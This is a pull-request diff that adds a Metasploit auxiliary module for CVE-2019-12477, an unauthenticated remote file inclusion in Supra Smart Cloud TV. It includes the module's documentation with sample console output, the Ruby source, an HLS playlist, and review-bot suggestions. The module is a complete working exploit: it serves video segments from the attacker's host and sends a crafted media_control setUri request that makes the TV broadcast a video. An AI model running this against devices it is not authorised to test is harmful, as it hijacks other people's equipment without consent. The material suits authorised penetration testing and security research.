Land #11952, Supra Smart Cloud TV RFI module
Showing 8 changed files with 134 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
#EXTM3U | ||
#EXT-X-VERSION:3 | ||
#EXT-X-TARGETDURATION:4 | ||
#EXT-X-MEDIA-SEQUENCE:0 | ||
#EXTINF:3.433333, | ||
epicsax0.ts | ||
#EXTINF:1.700000, | ||
epicsax1.ts | ||
#EXTINF:1.700000, | ||
epicsax2.ts | ||
#EXTINF:1.700000, | ||
epicsax3.ts | ||
#EXTINF:1.466667, | ||
epicsax4.ts | ||
#EXT-X-ENDLIST |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
35 changes: 35 additions & 0 deletions
documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
## Summary | ||
|
||
This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV. | ||
The media control for the device doesn't have any session management or authentication. Leveraging this, an | ||
attacker on the local network can send a crafted request to broadcast a fake video. | ||
|
||
**Reference:** https://www.inputzero.io/2019/06/hacking-smart-tv.html | ||
|
||
## Verification Steps | ||
|
||
1. `use auxiliary/admin/http/supra_smart_cloud_tv_rfi ` | ||
2. `set RHOSTS [IP]` | ||
3. `set SRVHOST [IP]` | ||
4. `run` | ||
|
||
Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system. | ||
|
||
## Sample Output | ||
|
||
``` | ||
msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 | ||
SRVHOST => 192.168.1.132 | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 | ||
RHOSTS => 192.168.1.155 | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run | ||
[*] Running module against 192.168.1.155 | ||
[*] Using URL: http://192.168.1.132:8080/ | ||
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80 | ||
[+] Doo-doodoodoodoodoo-doo | ||
[*] Sleeping for 10s serving .m3u8 and .ts files... | ||
[*] Server stopped. | ||
[*] Auxiliary module execution completed | ||
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > | ||
``` |
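Review bot: The Verification Steps in this doc begin at `use` with no setup section ahead of them, so nothing states which Supra Smart Cloud TV model or firmware the module was tested against, or that the TV must be able to reach SRVHOST on the listener port (8080 in the Sample Output) to fetch the playlist and segments. A short section before the steps covering both would make the documented result reproducible. Step 1 also has a trailing space inside the backticks, and the doc omits the CVE-2019-12477 identifier that the module's References carry.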
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,84 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::Remote::HttpServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Supra Smart Cloud TV Remote File Inclusion', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated remote file inclusion which | ||
exists in Supra Smart Cloud TV. The media control for the device doesn't | ||
have any session management or authentication. Leveraging this, an | ||
attacker on the local network can send a crafted request to broadcast a | ||
fake video. | ||
}, | ||
'Author' => [ | ||
'Dhiraj Mishra', # Discovery, PoC, and module | ||
'wvu' # Module | ||
], | ||
'References' => [ | ||
['CVE', '2019-12477'], | ||
['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html'] | ||
], | ||
'DisclosureDate' => '2019-06-03', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
deregister_options('URIPATH') | ||
end | ||
|
||
def run | ||
start_service('Path' => '/') | ||
|
||
print_status("Broadcasting Epic Sax Guy to #{peer}") | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => '/remote/media_control', | ||
'encode_params' => false, | ||
'vars_get' => { | ||
'action' => 'setUri', | ||
'uri' => get_uri + 'epicsax.m3u8' | ||
} | ||
) | ||
|
||
unless res && res.code == 200 && res.body.include?('OK') | ||
print_error('No doo-doodoodoodoodoo-doo for you') | ||
return | ||
end | ||
|
||
# Sleep time calibrated using successful pcap | ||
print_good('Doo-doodoodoodoodoo-doo') | ||
print_status('Sleeping for 10s serving .m3u8 and .ts files...') | ||
sleep(10) | ||
end | ||
|
||
def on_request_uri(cli, request) | ||
dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477') | ||
|
||
files = { | ||
'/epicsax.m3u8' => 'application/x-mpegURL', | ||
'/epicsax0.ts' => 'video/MP2T', | ||
'/epicsax1.ts' => 'video/MP2T', | ||
'/epicsax2.ts' => 'video/MP2T', | ||
'/epicsax3.ts' => 'video/MP2T', | ||
'/epicsax4.ts' => 'video/MP2T' | ||
} | ||
|
||
file = request.uri | ||
|
||
unless files.include?(file) | ||
vprint_error("Sending 404 for #{file}") | ||
return send_not_found(cli) | ||
end | ||
|
||
data = File.read(File.join(dir, file)) | ||
|
||
vprint_good("Sending #{file}") | ||
send_response(cli, data, 'Content-Type' => files[file]) | ||
end | ||
end |
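Review bot: In on_request_uri, `data = File.read(File.join(dir, file))` has no error handling, so a missing or unreadable file in the CVE-2019-12477 data directory raises inside the request handler instead of producing the 404 that unknown paths get. Rescuing the read error and calling `send_not_found(cli)` would keep the handler consistent, and `File.binread` is the better fit for the .ts segments, since `File.read` opens the file in text mode. The allowlist lookup on `request.uri` ahead of the `File.join` is what keeps the served path inside `dir`, so it should stay before the read in any refactor. In run, `sleep(10)` is hard-coded; the comment says it was calibrated from a pcap, so a datastore option defaulting to 10 would let the serving window be tuned when a client fetches more slowly.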